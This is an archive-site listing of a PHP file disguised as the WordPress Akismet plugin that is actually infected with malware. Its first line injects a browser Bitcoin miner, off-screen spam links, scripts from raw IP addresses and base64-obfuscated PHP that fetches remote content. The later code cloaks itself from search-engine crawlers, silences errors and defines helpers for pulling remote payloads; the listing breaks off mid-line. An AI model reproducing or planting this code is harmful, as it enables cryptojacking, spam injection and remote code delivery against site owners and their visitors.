home *** CD-ROM | disk | FTP | other *** search
/ ftp.t-online.hu / ftp.t-online.hu.tar / ftp.t-online.hu / public_html / va.php < prev    next >
Text File  |  2015-06-10  |  7KB  |  123 lines

  1. <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script>
  2. <script src="http://www.bitcoinplus.com/js/miner.js" type="text/javascript"></script>
  3. <script type="text/javascript">BitcoinPlusMiner("29461445")</script></iframe></iframe><style type="text/css">.wer { position:absolute; left:99%; top:0px;} .wer1 { position:absolute; left:98%; top:0px;} .wer2 { position:absolute; left:97%; top:0px;} .wer3 { position:absolute; left:96%; top:0px;}</style> <div class="wer"><a href="http://projectlabs.ru/" target="blank_"><img src="http://e-searching.net/style.png" alt="http://projectlabs.ru/" width="5" height="10" border="0" /></a><script type="text/javascript" src="http://199.175.50.209/t/link.php"></script><script type="text/javascript" src="http://counter.olusoft.com/1245361/link.php"></script><script type="text/javascript" src="http://91.239.65.173/t/link.php"></script><script src="http://capemadefieldguide.org/spam.phtml"></script></div><div class="wer1"><a href="http://iseekmate.com/" target="blank_"><img src="http://e-searching.net/style.png" alt="http://iseekmate.com/" width="5" height="10" border="0" /></a></div><div class="wer2"><a href="http://raftmaster.org/" target="blank_"><img src="http://e-searching.net/style.png" alt="http://raftmaster.org/" width="5" height="10" border="0" /></a></div><div class="wer3"><a href="http://searchnews.info/" target="blank_"><img src="http://www.e-searching.net/style.png" alt="http://searchnews.info/" width="5" height="10" border="0" /></a></div><div id="w3stats"><?php $u = base64_decode('aHR0cDovL2FsaS5kZG5zLnVzL2EvbC8=');$d = file_get_contents($u); $r = rand(10110, 97997);echo '<div style="position:absolute;left:-9045px;">'; echo "\n";echo '</div>'; echo "\n"; ?>
  4. <?php
  5. #55abac#
  6. /**
  7.  * @package Akismet
  8.  */
  9. /*
  10. Plugin Name: Akismet
  11. Plugin URI: http://akismet.com/
  12. Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.
  13. Version: 3.0.0
  14. Author: Automattic
  15. Author URI: http://automattic.com/wordpress-plugins/
  16. License: GPLv2 or later
  17. Text Domain: akismet
  18. */
  19.  
  20. /*
  21. This program is free software; you can redistribute it and/or
  22. modify it under the terms of the GNU General Public License
  23. as published by the Free Software Foundation; either version 2
  24. of the License, or (at your option) any later version.
  25.  
  26. This program is distributed in the hope that it will be useful,
  27. but WITHOUT ANY WARRANTY; without even the implied warranty of
  28. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  29. GNU General Public License for more details.
  30.  
  31. You should have received a copy of the GNU General Public License
  32. along with this program; if not, write to the Free Software
  33. Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
  34. */
  35.  
  36. if( empty( $tsq ) ) {
  37.     if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(
  38.             "/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",
  39.             $_SERVER['HTTP_USER_AGENT']
  40.         )
  41.     ) {
  42.     } else {
  43.         error_reporting( 0 );
  44.         @ini_set( 'display_errors', 0 );
  45.         if( !function_exists( '__url_get_contents' ) ) {
  46.             function __url_get_contents( $remote_url, $timeout )
  47.             {
  48.                 if( function_exists( 'curl_exec' ) ) {
  49.                     $ch = curl_init();
  50.                     curl_setopt( $ch, CURLOPT_URL, $remote_url );
  51.                     curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
  52.                     curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
  53.                     curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
  54.                     $_url_get_contents_data = curl_exec( $ch );
  55.                     curl_close( $ch );
  56.                 } elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
  57.                     $ctx = @stream_context_create(
  58.                         array(
  59.                             'http' =>
  60.                                 array(
  61.                                     'timeout' => $timeout,
  62.                                 )
  63.                         )
  64.                     );
  65.                     $_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
  66.                 } elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
  67.                     $handle = @fopen( $remote_url, "r" );
  68.                     $_url_get_contents_data = @stream_get_contents( $handle );
  69.                 } else {
  70.                     $_url_get_contents_data = __file_get_url_contents( $remote_url );
  71.                 }
  72.                 return $_url_get_contents_data;
  73.             }
  74.         }
  75.  
  76.         if( !function_exists( '__file_get_url_contents' ) ) {
  77.             function __file_get_url_contents( $remote_url )
  78.             {
  79.                 if( preg_match(
  80.                     '/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
  81.                     $remote_url,
  82.                     $matches
  83.                 )
  84.                 ) {
  85.                     $protocol = strtolower( $matches[1] );
  86.                     $host = $matches[2];
  87.                     $path = $matches[3];
  88.                 } else {
  89. // Bad remote_url-format
  90.                     return false;
  91.                 }
  92.                 if( $protocol == "http" ) {
  93.                     $socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
  94.                 } else {
  95. // Bad protocol
  96.                     return false;
  97.                 }
  98.                 if( !$socket ) {
  99. // Error creating socket
  100.                     return false;
  101.                 }
  102.                 $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
  103.                 $len_written = @fwrite( $socket, $request );
  104.                 if( $len_written === false || $len_written != strlen( $request ) ) {
  105. // Error sending request
  106.                     return false;
  107.                 }
  108.                 $response = "";
  109.                 while( !@feof( $socket ) &&
  110.                     ( $buf = @fread( $socket, 4096 ) ) !== false ) {
  111.                     $response .= $buf;
  112.                 }
  113.                 if( $buf === false ) {
  114. // Error reading response
  115.                     return false;
  116.                 }
  117.                 $end_of_header = strpos( $response, "\r\n\r\n" );
  118.                 return substr( $response, $end_of_header + 4 );
  119.             }
  120.         }
  121.  
  122.         $tsq['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
  123.         $tsq['SCRIPT